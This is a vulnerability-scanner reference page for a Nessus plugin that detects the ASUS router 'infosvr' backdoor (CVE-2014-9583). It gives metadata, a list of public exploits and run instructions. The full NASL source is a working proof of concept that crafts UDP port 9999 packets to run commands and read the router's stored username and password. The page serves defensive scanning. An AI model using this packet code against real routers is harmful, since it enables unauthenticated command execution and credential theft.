ASUS Router 'infosvr' Remote Command Execution - Nessus

Critical   Plugin ID: 80518

---

This page contains detailed information about the ASUS Router 'infosvr' Remote Command Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview

---

ID: 80518
Name: ASUS Router 'infosvr' Remote Command Execution
Filename: asuswrt_infosvr_command_exec.nasl
Vulnerability Published: 2015-01-04
This Plugin Published: 2015-01-14
Last Modification Time: 2019-11-25
Plugin Version: 1.9
Plugin Type: remote
Plugin Family: Backdoors
Dependencies: None

Vulnerability Information

---

Severity: Critical
Vulnerability Published: 2015-01-04
Patch Published: N/A
CVE [?]: CVE-2014-9583
CPE [?]: cpe:/o:asus:rt-ac66u_firmware, cpe:/o:asus:rt-n66u_firmware

Synopsis

The remote device contains a backdoor.

Description

The remote device is an ASUS router that contains firmware which is affected by a flaw in its 'infosvr' service due to not properly checking the MAC address of a request. An unauthenticated, remote attacker, using a crafted request to UDP port 9999, can exploit this to run arbitrary commands or access configuration details (including passwords) on the device.

Solution

Contact the device vendor regarding the availability of an update.

Public Exploits

---

Target Network Port(s): N/A
Target Asset(s): N/A
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the ASUS Router 'infosvr' Remote Command Execution vulnerability:

1. Metasploit: exploit/linux/misc/asus_infosvr_auth_bypass_exec
   [ASUS infosvr Auth Bypass Command Execution]
2. Exploit-DB: exploits/hardware/remote/35688.py
   [EDB-35688: ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution]
3. Exploit-DB: exploits/hardware/remote/43881.txt
   [EDB-43881: AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution]
4. Exploit-DB: exploits/hardware/remote/44524.rb
   [EDB-44524: ASUS infosvr - Authentication Bypass Command Execution (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

---

CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:ND

CVSS Base Score:	10.0 (High)
Impact Subscore:	10.0
Exploitability Subscore:	10.0
CVSS Temporal Score:	9.5 (High)
CVSS Environmental Score:	NA (None)
Modified Impact Subscore:	NA
Overall CVSS Score:	9.5 (High)

Go back to menu.

Plugin Source

---

This is the asuswrt_infosvr_command_exec.nasl nessus plugin source code. This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(80518);
  script_version("1.9");
  script_cvs_date("Date: 2019/11/25");

  script_cve_id("CVE-2014-9583");
  script_bugtraq_id(71889);
  script_xref(name:"EDB-ID", value:"35688");

  script_name(english:"ASUS Router 'infosvr' Remote Command Execution");
  script_summary(english:"Attempts to exploit the ASUS Router 'infosvr' service backdoor.");

  script_set_attribute(attribute:"synopsis", value:
"The remote device contains a backdoor.");
  script_set_attribute(attribute:"description", value:
"The remote device is an ASUS router that contains firmware which is
affected by a flaw in its 'infosvr' service due to not properly
checking the MAC address of a request. An unauthenticated, remote
attacker, using a crafted request to UDP port 9999, can exploit this
to run arbitrary commands or access configuration details (including
passwords) on the device.");
  # https://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ba42dc23");
  script_set_attribute(attribute:"see_also", value:"https://event.asus.com/2013/nw/ASUSWRT/");
  script_set_attribute(attribute:"see_also", value:"https://github.com/jduck/asus-cmd");
  script_set_attribute(attribute:"solution", value:
"Contact the device vendor regarding the availability of an update.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ASUS infosvr Auth Bypass Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/01/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:asus:rt-ac66u_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:asus:rt-n66u_firmware");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Backdoors");

  script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_require_udp_ports(9999);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("raw.inc");
include("data_protection.inc");

port = 9999;

if (islocalhost()) exit(0, "This plugin can not be run against the localhost.");
if (!islocalnet()) exit(0, "The remote host is more than one hop away.");

if (known_service(port:port, ipproto:"udp")) audit(AUDIT_SVC_ALREADY_KNOWN, port);
if (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, "udp");

set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);

function run_command(udp_socket, command, timeout)
{
  local_var packet, ll, bpf, output, res, pkt, data, out_len;

  output = NULL;

  packet =
    mkbyte(0x0C) +
    mkbyte(0x15) +
    mkword(0x0033) +
    mkdword(rand()) +
    mkpad(38) +
    mkword(strlen(command)) +
    command;

  packet = packet + mkpad(512 - strlen(packet));

  ll = link_layer();
  if (isnull(ll)) exit(1, "Could not find the link layer we are operating on.");

  bpf = bpf_open("udp and src port 9999 and dst port 9999 and dst host 255.255.255.255");
  if (isnull(bpf)) exit(1, "Could not obtain a bpf.");

  send(socket:udp_socket, data:packet);

  res = bpf_next(bpf:bpf, timeout:timeout);
  if (!isnull(res))
  {
    res = substr(res, strlen(ll), strlen(res) - 1);
    if (!isnull(res))
    {
      pkt = packet_split(res);
      if (!isnull(pkt) && !isnull(pkt[2]) &&!isnull(pkt[2]['data']))
      {
        data = pkt[2]['data'];
        if (strlen(data) >= 16)
        {
          out_len = getword(blob:data, pos:14);
          if (out_len > 0)
          {
            output = chomp(substr(data, 16, 15 + out_len));
          }
        }
      }
    }
  }

  bpf_close(bpf);

  return output;
}

s = open_sock_udp(port);
if (!s) audit(AUDIT_SOCK_FAIL, port, "udp");

timeout = get_read_timeout() * 1000;

wps_mfstring = run_command(udp_socket:s, command:"nvram get wps_mfstring", timeout:timeout);

if ("ASUS" >!< wps_mfstring) audit(AUDIT_NOT_LISTEN, "The ASUSWRT 'infosvr' service", port, "udp");

user = run_command(udp_socket:s, command:"nvram get http_username", timeout:timeout);
pass = run_command(udp_socket:s, command:"nvram get http_passwd", timeout:timeout);

# mask the actual password except the first and last character
if (!isnull(pass) && strlen(pass) >= 2)
  pass = pass[0] + crap(data:'*', length:6) + pass[strlen(pass)-1];

register_service(port:port, ipproto:"udp", proto:"asuswrt_infosvr");

if (report_verbosity > 0 && !isnull(user) && !isnull(pass))
{
  report =
    '\nNessus was able to exploit the vulnerability to gather the HTTP' +
    '\ncredentials of the ASUS router:' +
    '\n' +
    '\n  Username : ' + data_protection::sanitize_user_enum(users:user) +
    '\n  Password : ' + pass +
    '\n' +
    '\nNote that the password displayed here has been partially obfuscated.' +
    '\n';

  security_hole(port:port, proto:"udp", extra:report);
}
else security_hole(port:port, proto:"udp");

The latest version of this script can be found in these locations depending on your platform:

• Linux / Unix:
  /opt/nessus/lib/nessus/plugins/asuswrt_infosvr_command_exec.nasl
• Windows:
  C:\ProgramData\Tenable\Nessus\nessus\plugins\asuswrt_infosvr_command_exec.nasl
• Mac OS X:
  /Library/Nessus/run/lib/nessus/plugins/asuswrt_infosvr_command_exec.nasl

Go back to menu.

How to Run

---

Here is how to run the ASUS Router 'infosvr' Remote Command Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

1. Click to start a New Scan.
2. Select Advanced Scan.
3. Navigate to the Plugins tab.
4. On the top right corner click to Disable All plugins.
5. On the left side table select Backdoors plugin family.
6. On the right side table select ASUS Router 'infosvr' Remote Command Execution plugin ID 80518.
7. Specify the target on the Settings tab and click to Save the scan.
8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl asuswrt_infosvr_command_exec.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a asuswrt_infosvr_command_exec.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - asuswrt_infosvr_command_exec.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state asuswrt_infosvr_command_exec.nasl -t <IP/HOST>

Go back to menu.

References

---

BID | SecurityFocus Bugtraq ID:

• 71889

See also:

• https://www.tenable.com/plugins/nessus/80518
• https://event.asus.com/2013/nw/ASUSWRT/
• https://github.com/jduck/asus-cmd
• http://www.nessus.org/u?ba42dc23
• https://vulners.com/nessus/ASUSWRT_INFOSVR_COMMAND_EXEC.NASL

Similar and related Nessus plugins:

• 40372 - VMSA-2008-0001 : Moderate OpenPegasus PAM Authentication Buffer Overflow and updated service console packages
• 69240 - Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution
• 70585 - NETGEAR ReadyNAS Remote Unauthenticated Command Execution
• 76616 - HP Data Protector 8.x Arbitrary Command Execution (HPSBMU03072)
• 76873 - TimThumb 'timthumb.php' < 2.8.14 WebShot 'src' Parameter Remote Command Execution
• 76874 - TimThumb 'timthumb.php' WebShot 'src' Parameter Remote Command Execution
• 77334 - Huawei AR Router Remote Command Execution (HWNSIRT-2013-0427)
• 77969 - Postfix Script Remote Command Execution via Shellshock
• 77970 - Qmail Remote Command Execution via Shellshock
• 78701 - Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock
• 78822 - SIP Script Remote Command Execution via Shellshock
• 79233 - HP Data Protector 'EXEC_INTEGUTIL' Arbitrary Command Execution
• 79804 - CUPS Remote Command Execution via Shellshock
• 80148 - FreeBSD : git -- Arbitrary command execution on case-insensitive filesystems (1d567278-87a5-11e4-879c-000c292ee6b8)
• 80202 - GitHub for Windows < 2.6.5 .git/config Command Execution
• 80220 - GitHub < 1.9.4 .git/config Command Execution (Mac OS X)
• 80306 - Git for Windows .git/config Command Execution
• 80333 - Microsoft Visual Studio .gitconfig Command Execution
• 84086 - D-Link Router HNAP GetDeviceSettings Remote Command Execution
• 84217 - phpMoAdmin saveObject Remote Command Execution
• 84409 - FreeBSD : elasticsearch -- remote OS command execution via Groovy scripting engine (026759e0-1ba3-11e5-b43d-002590263bf5)
• 84411 - FreeBSD : elasticsearch and logstash -- remote OS command execution via dynamic scripting (43ac9d42-1b9a-11e5-b43d-002590263bf5)
• 85005 - Accellion Secure File Transfer Appliance 'oauth_token' Parameter Remote Command Execution
• 85850 - Barracuda Web Filter <= 5.0.0.012 Remote Command Execution
• 86137 - GLSA-201509-06 : Git: Arbitrary command execution
• 92913 - FreeBSD : FreeBSD -- Remote command execution in ftp(1) (7488378d-6007-11e6-a6c3-14dae9d210b8)
• 95393 - FreeBSD : Roundcube -- arbitrary command execution (125f5958-b611-11e6-a9a5-b499baebfeaf)
• 96118 - FreeBSD : vim -- arbitrary command execution (c11629d3-c8ad-11e6-ae1b-002590263bf5)
• 96472 - FreeBSD : Ansible -- Command execution on Ansible controller from host (a93c3287-d8fd-11e6-be5c-001fbc0f280f)
• 99595 - Tenable Appliance < 4.5.0 Web UI simpleupload.py Remote Command Execution (CVE-2017-8051)

Version

---

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file asuswrt_infosvr_command_exec.nasl version 1.9. For more plugins, visit the Nessus Plugin Library.

Go back to menu.